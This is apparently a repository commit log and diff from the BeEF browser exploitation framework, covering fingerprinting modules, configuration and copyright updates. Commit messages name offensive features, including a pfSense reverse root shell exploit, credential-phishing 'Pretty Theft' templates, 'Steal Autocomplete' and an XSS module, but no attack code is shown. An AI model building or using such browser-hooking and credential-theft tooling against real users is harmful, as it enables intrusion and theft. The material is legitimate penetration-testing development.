bf2dc1d387 Remove redundant line 2013-02-23 15:27:54 +10:30
bcoles
8f1a26ffa9 Add "Hardware" to console browser details 2013-02-23 15:27:29 +10:30
bcoles
de1ab2d1f9 Fix issue #838 
Fixes detect_toolbars target configuration
 2013-02-23 12:32:57 +10:30
bcoles
772b2fd1e7 Add VLC details to hooked browser balloon popup 
Part of issue #828
 2013-02-22 12:14:43 +10:30
Brendan Coles
765c834f78 Merge pull request #844 from Nbblrr/master 
Plugin for VLC detection (ticket #828)
 2013-02-21 17:58:55 -08:00
Nbblrr
7eec331cf9 Plugin for VLC detection #828 2013-02-21 23:14:28 +01:00
Wade Alcorn
1c252af145 Updated version number to make explicit the patched Rack::File xss fix 2013-02-21 21:10:24 +10:00
antisnatchor
5a15a9afdd Merge remote-tracking branch 'origin/master' 2013-02-20 11:58:11 +00:00
antisnatchor
c37f0e1719 Patched Rack::File to don't reflect the URI path in the page if a file is not found. Official patch is not out yet. 2013-02-20 11:57:37 +00:00
bcoles
0734bb0750 Update Proxy tab 2013-02-20 00:57:53 +10:30
bcoles
4718075b2c Add Yammer template to Pretty Theft module 2013-02-19 16:01:10 +10:30
bcoles
514f367803 Merge branch 'master' of https://github.com/beefproject/beef 2013-02-19 15:20:02 +10:30
bcoles
753a78f5fc Add YouTube template to Pretty Theft module 2013-02-19 15:19:27 +10:30
antisnatchor
c222d0e4e3 Patched BeEF hook core to support injection when the hooked domain uses HttpOnly. 2013-02-18 17:19:49 +00:00
Brendan Coles
5e257d4e33 Merge pull request #843 from gcattani/834-hasRealPlayer 
Add RealPlayer detection
 2013-02-17 08:30:40 -08:00
gcatt
007769aa93 Corrected mistake 2013-02-17 12:41:30 +01:00
gcatt
63695e66d7 Add RealPlayer detection 2013-02-17 12:37:56 +01:00
antisnatchor
074a11c85a Updated Chrome sample extension with latest requirements (CSP/version/etc.). Not it works on latest Chrome. Also Updated the fake_flash_update description with more info. 2013-02-12 10:53:19 +00:00
Brendan Coles
88086811a0 Merge pull request #842 from bcoles/isTouchEnabled 
Add beef.hardware.isTouchEnabled()
 2013-02-10 08:57:53 -08:00
bcoles
90174dda23 Add beef.hardware.isTouchEnabled() 2013-02-11 02:46:35 +10:30
bmantra
fa7b90f123 Merge pull request #840 from bmantra/master 
Metasploit auto launcher not supported on windows
 2013-02-06 10:53:36 -08:00
bmantra
17aa898099 correct last commit, set auto_msfrpcd back to false 2013-02-06 19:42:14 +01:00
bmantra
f879584f1b changed windows default path and changed message 2013-02-06 19:37:31 +01:00
bmantra
2d27266fc9 added message that metasploit auto launch is not available on MS Windows 2013-02-06 19:22:12 +01:00
bcoles
2d08183eef Refactor 'select_zombie_summary' 
extensions/admin_ui/controllers/modules/modules.rb
    extensions/console/lib/shellinterface.rb

Fix issue #837
 2013-02-07 02:44:40 +10:30
bcoles
bf19223a01 Add 'HasQuickTime' to core/main/handlers/browserdetails.rb 2013-02-07 02:43:58 +10:30
bcoles
11a56c5ce9 Add hasQuickTime to browser object 2013-02-05 01:41:21 +10:30
antisnatchor
4852cab66d Properly adjusted onClose command module to annoy the user also in latest Firefox. 2013-02-04 12:09:46 +00:00
bcoles
79e8f34b06 Add QuickTime to zombie balloon details 
Add 'modules/browser/detect_quicktime'
 2013-02-04 09:10:59 +10:30
radoen
4003b69646 Update core/main/client/browser.js 2013-02-03 12:32:25 +01:00
radoen
ad2a93fc60 Merge branch 'master' of github.com:beefproject/beef 2013-02-03 11:30:37 +01:00
radoen
4e73163403 ISSUES #817 
to refine UI rendering.

Note In FF 21.xx the old detection method correctly work yet
 2013-02-03 01:45:01 +01:00
bcoles
19d1827c36 Add 'Steal Autocomplete' module 
Part of issue #601
 2013-02-03 08:51:04 +10:30
radoen
fdf3dff690 ISSUES #817 
to refine UI rendering.

Note In FF 21.xx the old detection method correctly work yet
 2013-02-02 22:07:28 +01:00
bcoles
f7b55be03a Add 'beef.browser.hasQuickTime()' 
Merged manually from https://github.com/beefproject/beef/pull/836

Fix issue #835

starting
 2013-02-03 05:59:06 +10:30
bcoles
ce1cc61ac1 Add ActiveX and Silverlight to zombie balloon details 2013-02-03 05:47:07 +10:30
bcoles
8b56a147a9 Rename 'System Platform' to 'Browser Platform' in UI 2013-02-03 05:28:49 +10:30
bcoles
449c6633aa Rename 'System Platform' to 'Browser Platform' 2013-02-03 05:24:48 +10:30
bcoles
95970d5364 Add 'beef.browser.hasSilverlight()' 
Add 'modules/browser/detect_silverlight'
 2013-02-03 04:42:13 +10:30
bcoles
2c10dd040c Add 'beef.hardware.isLaptop()' 2013-02-03 03:55:14 +10:30
bcoles
cdc92f084e Add laptop icon 2013-02-03 03:41:29 +10:30
bcoles
15a502bce6 Add CPU type to browser initialization 
Add support for Firefox 19
 2013-02-03 03:39:30 +10:30
bcoles
10bdcce34a Fix typos in 'beef.hardware.cpuType()' and OS detection 2013-02-03 03:36:41 +10:30
bcoles
7dc1882427 Add virtual machine icon to browser 
'BeEF::Core::Models::BrowserDetails::hw_icon()'
 2013-02-03 03:02:27 +10:30
bcoles
78162e6d26 Add 'beef.hardware.cpuType()' 2013-02-03 03:01:54 +10:30
bcoles
6913e97e2e Update Windows OS detection 
Add functions:
  beef.os.isWinCE()
  beef.os.isWin2000SP1()
  beef.os.isWindows()
 2013-02-03 03:01:18 +10:30
Wade Alcorn
0df85344f0 Changed ActiveX detection slightly 2013-02-01 07:11:53 +10:00
bcoles
c88a2bb8e3 Update 'Detect Virtual Machine' module 2013-02-01 04:32:16 +10:30
bcoles
e3dced8a9e Add virtual machine icon 2013-02-01 04:30:25 +10:30
bcoles
30171693ff Add 'beef.hardware.isVirtualMachine()' 
Rename 'beef.hardware.getMobileName()' to 'beef.hardware.getName()'
 2013-02-01 04:29:06 +10:30
bcoles
065276932c Add os_fingerprinting module 2013-02-01 02:51:45 +10:30
bcoles
61d0bf2e14 Add beef.browser.hasActiveX() 
Add modules/browser/detect_activex module

Fix issue #832
 2013-02-01 01:22:45 +10:30
bcoles
06221d2540 cleanup .gitignore 2013-02-01 01:06:31 +10:30
Brendan Coles
e14be26951 Merge pull request #827 from gcattani/master 
Module: Detect Toolbars
 2013-01-31 07:10:00 -08:00
gcatt
daadf59782 Module: Detect Toolbars 
Added a module to detect browser toolbars by checking the User-Agent
and the DOM
 2013-01-31 09:20:32 +01:00
bcoles
c085c2d3d7 Add detection for IE10 
Fixes issue #818
 2013-01-28 01:05:31 +10:30
bcoles
209e64a9ef Add IE 7-9 detection to browser_fingerprinting module 2013-01-28 01:02:53 +10:30
bcoles
3cb7bb9f51 Add support for Windows 8 2013-01-28 01:01:29 +10:30
bcoles
e8d85b550b Rename "Detect Chrome/Firefox Extensions" module to "Detect Extensions" 
Added placeholder for IE toolbar detection
 2013-01-27 22:35:14 +10:30
Wade Alcorn
29480a24da Version number updated 2013-01-27 14:40:16 +10:00
bmantra
777f796243 Merge pull request #823 from bmantra/master 
pfSense reverse root remote shell #812
 2013-01-25 12:08:22 -08:00
bmantra
8cd570c62d pfsense reverse root shell exploit #812 2013-01-25 21:05:43 +01:00
bmantra
e383b7f9d5 Merge pull request #822 from bmantra/master 
added pfSense detection to internal fingerprint module
 2013-01-25 10:54:17 -08:00
bmantra
1ad6039f0a fingerprint network detect pfSense 2013-01-25 19:52:09 +01:00
bcoles
8d151fb818 Add HTTPS support for internal_network_fingerprinting module 
Comment out a few fingerprints for 'rare' software in order to increase
speed
 2013-01-25 12:34:04 +10:30
antisnatchor
e321d6e3d8 Added support for Chrome 24 2013-01-23 11:39:26 +00:00
ben-waugh
3433e44d74 LiveCD - improved interrupt capture 2013-01-23 17:20:33 +10:00
ben-waugh
152edc445d LiveCD - added MSF integration 2013-01-23 17:09:38 +10:00
ben-waugh
81be99074a Metasploit extension config - added livecd path 2013-01-23 07:08:04 +10:00
ben-waugh
d81dc8044e LiveCD - fixed a bug in menu display showing sqlmap enabled 2013-01-22 09:57:43 +10:00
ben-waugh
56d6b54d08 BeEFLive - New Menu 
replaces the old tree/Q&A style for a menu presenting all options
 2013-01-22 09:53:51 +10:00
Christian Frichot
2d9b894a3c Added some further comments to the new AssetHandler redirector. See #664 2013-01-20 17:03:26 +08:00
Christian Frichot
3c4a0fad34 New bind_redirect method added to the AssetHandler. See #664 2013-01-20 16:59:01 +08:00
antisnatchor
63b7d44a5e Enabled debug_modules tests. Now they work properly and are effective to automatically check if command modules generally work. 2013-01-17 14:17:04 +00:00
qswain2
f584403a92 Move jools tests to integration 
Moved tc_jools to integrations test directory
since the requires seem to be what were breaking
the other tests in the unit test suit
 2013-01-16 05:47:09 -05:00
Saafan
efa4854b79 Merge branch 'master' of https://github.com/beefproject/beef 2013-01-15 17:04:12 +02:00
Saafan
cc49004189 Fix IE java detection. 2013-01-15 17:03:54 +02:00
Michele Orru
c8c6d30468 Merge pull request #778 from Skyr/master 
Fix for Javascript errors in Phonegap
 2013-01-15 03:56:50 -08:00
qswain2
fcbd2516e6 Add test cases for jools 
Added test cases for jools based on examples
 2013-01-14 23:12:55 -05:00
bcoles
224cf0c7d0 Added window.devicePixelRatio to Firefox 18 detection 2013-01-12 14:26:16 +10:30
bcoles
c2dbc50d00 Added support for Firefox 18 2013-01-10 08:44:50 +10:30
antisnatchor
c1fefecf70 Merge branch 'master' of https://github.com/beefproject/beef 2013-01-09 15:01:50 +00:00
antisnatchor
60589dc607 Minor changes to MiTB core. 2013-01-09 15:01:07 +00:00
Saafan
5d9821aa74 Temporary workaround to fix IE not being hooked due to java detection code. 2013-01-09 00:47:45 +02:00
root
0f40a0fb9a Merge branch 'master' of https://github.com/beefproject/beef 2013-01-07 01:32:29 -05:00
root
6c16a89328 Added simple adblock checks for IE from issue #803 2013-01-07 01:30:44 -05:00
bcoles
e275e4001c Add SQLiteManager XSS module 2013-01-07 12:30:24 +10:30
Brendan Coles
644a53cb2c Merge pull request #816 from Nbblrr/master 
Pull Request : Module Detect extensions on Firefox
 2013-01-06 13:50:53 -08:00
Nbblrr
87afb9a31b Improved extension detection with the old Firefox hack #815 2013-01-06 22:39:43 +01:00
bcoles
bd2b002314 Fix a few typos 2013-01-07 05:17:55 +10:30
Michele Orru
15eb6a4b07 Merge pull request #813 from Nbblrr/master 
Merge of Hardware detection improvement with mdetect (#722)
 2013-01-06 04:40:10 -08:00
Nbblrr
da7a7b9603 Improved Hardware detection with mdetect 2. #722 2013-01-05 20:43:28 +01:00
Nbblrr
3fe37ec7b1 Improved Hardware detection with mdetect. Ticket #722 2013-01-05 00:03:25 +01:00
Christian Frichot
9c6802cd8f Updated QR Code Extension - URLs can now be full, not just sub-domains #811 2013-01-03 19:25:00 +08:00
Michele Orru
00ad35d878 Merge pull request #809 from phillcampbell/development 
Remove Thin 'Server' response header
 2013-01-03 01:47:58 -08:00
Phill Campbell
cae2559fa3 Remove Thin 'Server' response header 2013-01-02 23:29:21 +00:00
antisnatchor
ba02b6ec87 Merge branch 'master' of https://github.com/beefproject/beef 2013-01-02 21:35:02 +01:00
ben-waugh
12fe2ed86c LiveCD - updated links and copyright year 2013-01-03 07:31:34 +10:00
antisnatchor
c0a256f1b0 Refactored Ipec and Autorun tabs to use the new beefwui object: get_rest_token is now a common function :D 2013-01-02 20:09:23 +01:00
antisnatchor
1ce620a626 Created a new beef_common.js files with common functions for the Web UI. Registered as beefwui in the main window object. 2013-01-02 20:07:49 +01:00
antisnatchor
cea8a4b0e3 ARE: fixed bug which was preventing the execution of modules without input. 2013-01-02 19:03:27 +01:00
antisnatchor
1cd83663aa ARE: properly closed a couple of more statements. 2013-01-02 18:37:26 +01:00
antisnatchor
b6b968a7a0 ARE: removed a couple of unneeded commas. 2013-01-02 18:33:57 +01:00
antisnatchor
276d465dd1 ARE: properly closed a couple of statements. 2013-01-02 18:31:23 +01:00
antisnatchor
8947d78d66 ARE: added mod_id to the multi_module API call. The bug was preventing correct module calling. 2013-01-02 18:30:06 +01:00
antisnatchor
98da93fb12 ARE: fixed hardcoded URLs 2013-01-02 18:07:53 +01:00
qswain2
f39b16712a Added auto-run tab 
Added a new tab in the ui for the auto-run.
and allows modules to be selected with a
checkboxes.Added a handler to hide autorun
tab. Added stubs to ARE.
 2013-01-01 18:01:53 -05:00
antisnatchor
d976e86cbe Refactored mitm.js AJAX sniffing feature. Fixed a couple of other bugs in mitb.js 2012-12-30 13:13:10 +01:00
ben-waugh
0244980db0 LiveCD - Added proxy demo for sqlmap #789 2012-12-30 17:34:06 +10:00
ben-waugh
0580b86744 Move liveCD Script to a new folder #781 2012-12-30 16:23:50 +10:00
Wade Alcorn
701dd34c83 Version number updated 2012-12-30 12:48:45 +10:00
Wade Alcorn
fe40038441 Updated copyright year to 2013 2012-12-30 12:47:43 +10:00
Saafan
ba5ee180e4 -Updated "Detect Java Support" using the official oracle deployment support script to detect if Java is enabled. 2012-12-29 13:33:23 +02:00
Saafan
ca72854911 Merge branch 'master' of https://github.com/beefproject/beef 2012-12-29 12:51:02 +02:00
bcoles
bdab1028f5 Added Detect Virtual Machine module 2012-12-16 16:22:41 +10:30
bcoles
4e7e1129bb Added Detect Default Browser module 2012-12-13 18:04:16 +10:30
bcoles
7b4d4de3eb Added support for Firefox 17 2012-12-13 18:00:22 +10:30
Stefan Schlott
df365b74c2 Fix Javascript errors in Phonegap (see #777) 2012-12-11 15:54:41 +01:00
Saafan
4cee2c550f Merge branch 'master' of https://github.com/beefproject/beef 2012-06-07 14:07:37 +02:00
asaafan
f10cf3eb5b Delete Skype XSS stub from main branch 2012-03-09 01:53:07 +02:00
asaafan
1333e48d3a Merge branch 'master' of https://github.com/beefproject/beef 2012-03-09 01:51:18 +02:00
unknown
006719768a Adding stub for Skype XSS module 2012-03-09 01:38:37 +02:00
961 changed files with 18200 additions and 3799 deletions
Expand all files Collapse all files

7
.gitignore vendored
View File

@@ -1,3 +1,8 @@
beef.db
test/msf-test
custom-config.yaml
custom-config.yaml
.DS_Store
.gitignore
.rvmrc
*.lock

112
BeEFLive.sh
View File

@@ -1,110 +1,2 @@
#!/bin/bash
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'home/beef/doc/COPYING' for copying permission
#
#
# This is the auto startup script for the BeEF Live CD.
# IT SHOULD ONLY BE RUN ON THE LIVE CD
# Download LiveCD here: https://github.com/beefproject/beef/downloads
#
# This script contains a few fixes to make BeEF play nicely with the way
# remastersys creates the live cd distributable as well as generating host keys
# to enable SSH etc. The script also make it easy for the user to update/start
# the BeEF server
#
clear
echo "======================================"
echo " BeEF Live CD "
echo "======================================"
echo ""
echo "Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net"
echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
echo "See the file 'home/beef/doc/COPYING' for copying permission"
echo ""
echo "Welcome to the BeEF Live CD"
echo ""
echo ""
#
# Check for SSH Host Keys - if they do not exist ask user if they should be
# created (remastersys has a habit of deleting them during Live CD Creation)
#
f1="/etc/ssh/ssh_host_rsa_key"
if [ -f $f1 ]
then
echo ""
else
echo -n "Would you like to enable ssh (y/N)? "
read var
if [ $var = "y" ] ; then
sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
echo ""
echo "Please provide a password for ssh user: beef"
sudo passwd beef
echo "ssh enabled"
fi
fi
echo ""
#
# Prompt the user if they would like to update BeEF and
# other components installed (such as sqlmap and msf)
#
echo -n "Check and install updates for BeEF (y/N)? "
read var
if [ $var = "y" ] ; then
cd /opt/beef
git stash
git pull
fi
echo ""
echo -n "Check and install updates for msf and sqlmap (y/N)? "
read var
if [ $var = "y" ] ; then
cd /opt/sqlmap
git stash
git pull
cd /opt/metasploit-framework
git stash
git pull
fi
#
# Create a shortcut in the user's home folder to BeEF, msf and sqlmap
# (if they do not yet exist)
#
f1="beef"
if [ -f $f1 ] ; then
echo ""
else
ln -s /opt/beef/ beef
ln -s /opt/metasploit-framework/ msf
ln -s /opt/sqlmap/ sqlmap
fi
#
# Prompt the user if they would like start BeEF
#
echo -n "Start BeEF (y/N)? "
read var
if [ $var = "y" ] ; then
echo ""
echo "Starting BeEF..";
cd /opt/beef
ruby beef -x
fi
# Reference for old (<1.2) versions of BeEF Live
bash /opt/beef/liveCD/BeEFLive.sh

16
Gemfile
View File

@@ -1,7 +1,7 @@
# BeEF's Gemfile
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -9,15 +9,18 @@
# Gems only required on Windows, or with specific Windows issues
if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
gem "win32console"
gem "eventmachine", "1.0.0.beta.4.1"
else
gem "eventmachine", "0.12.10"
end
gem "eventmachine", "1.0.3"
gem "thin"
gem "sinatra", "1.3.2"
gem "sinatra", "1.4.2"
gem "rack", "1.5.2"
gem "em-websocket", "~> 0.3.6"
gem "jsmin", "~> 1.0.1"
gem "uglifier", "~> 2.2.1"
# install https://github.com/cowboyd/therubyracer if the OS is != than OSX
if !RUBY_PLATFORM.downcase.include?("darwin")
gem "therubyracer", "~> 0.12.0"
end
gem "ansi"
gem "term-ansicolor", :require => "term/ansicolor"
gem "dm-core"
@@ -28,6 +31,7 @@ gem "parseconfig"
gem "erubis"
gem "dm-migrations"
gem "msfrpc-client"
gem "rubyzip", "~> 1.0.0"
# notifications
gem "twitter"

2
INSTALL.txt
View File

@@ -1,6 +1,6 @@
===============================================================================
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission

2
README
View File

@@ -1,6 +1,6 @@
===============================================================================
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission

5
README.mkd
View File

@@ -1,6 +1,6 @@
===============================================================================
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
@@ -72,3 +72,6 @@ To get started, simply execute beef and follow the instructions:
$ ./beef
On windows use
$ ruby beef

8
Rakefile
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -76,10 +76,10 @@ end
@beef_process_id = nil;
task :beef_start => 'beef' do
printf "Starting BeEF (wait 10 seconds)..."
printf "Starting BeEF (wait a few seconds)..."
@beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
delays.each do |i| # delay for 10 seconds
delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
delays.each do |i| # delay for a few seconds
printf '.'
sleep (i)
end

4
VERSION
View File

@@ -1,7 +1,7 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
0.4.3.9-alpha
0.4.4.8-alpha

3
beef
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env ruby
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
DataMapper.setup(:default,
:adapter => config.get("beef.database.driver"),
:host => config.get("beef.database.db_host"),
:port => config.get("beef.database.db_port"),
:username => config.get("beef.database.db_user"),
:password => config.get("beef.database.db_passwd"),
:database => config.get("beef.database.db_name"),

27
config.yaml
View File

@@ -1,12 +1,12 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.4.3.9-alpha'
version: '0.4.4.8-alpha'
debug: false
restrictions:
@@ -27,30 +27,38 @@ beef:
# if running behind a nat set the public ip address here
#public: ""
#public_port: "" # port setting is experimental
dns: "localhost"
panel_path: "/ui/panel"
# DNS
dns_host: "localhost"
dns_port: 53
web_ui_basepath: "/ui"
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
# Allow one or multiple domains to access the RESTful API using CORS
# For multiple domains use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
secure: true # use 'WebSocketSecure' works only on HTTPS domains and with HTTPS support enabled in BeEF
port: 61985 # WS: good success rate through proxies
secure_port: 61986 # WSSecure
ws_poll_timeout: 1000 # poll BeEF every second
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: false
enable: true
type: "apache" #supported: apache, iis
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.dns (the domain name of the server where you run BeEF)
# used in beef.http.dns_host (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
@@ -72,6 +80,7 @@ beef:
# db connection information is only used for mysql/postgres
db_host: "localhost"
db_port: 5432
db_name: "beef"
db_user: "beef"
db_passwd: "beef123"
@@ -91,6 +100,10 @@ beef:
crypto_default_value_length: 80
# Enable client-side debugging
client:
debug: false
# You may override default extension configuration parameters here
extension:
requester:

2
core/api.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/extension.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/extensions.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/main/configuration.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/main/migration.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/main/network_stack/assethandler.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/main/server.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/main/server/hook.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/module.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/modules.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

5
core/bootstrap.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -24,6 +24,8 @@ require 'core/main/handlers/browserdetails'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
require 'core/main/network_stack/handlers/redirector'
require 'core/main/network_stack/handlers/raw'
require 'core/main/network_stack/assethandler'
require 'core/main/network_stack/api'
@@ -43,6 +45,7 @@ require 'core/main/rest/handlers/modules'
require 'core/main/rest/handlers/categories'
require 'core/main/rest/handlers/logs'
require 'core/main/rest/handlers/admin'
require 'core/main/rest/handlers/server'
require 'core/main/rest/api'
## @note Include Websocket

5
core/core.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -37,4 +37,7 @@ require 'core/main/migration'
require 'core/main/console/commandline'
require 'core/main/console/banners'
# @note Include rubyzip lib
require 'zip'

2
core/extension.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/extensions.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/filters.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/filters/base.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

8
core/filters/browser.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -22,7 +22,7 @@ module Filters
def self.is_valid_browsertype?(str)
return false if not is_non_empty_string?(str)
return false if str.length < 10
return false if str.length > 50
return false if str.length > 250
return false if has_non_printable_char?(str)
true
end
@@ -123,9 +123,9 @@ module Filters
return true if not is_non_empty_string?(str)
return false if str.length > 1000
if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
else
return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
end
end

2
core/filters/command.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/filters/http.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/filters/page.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
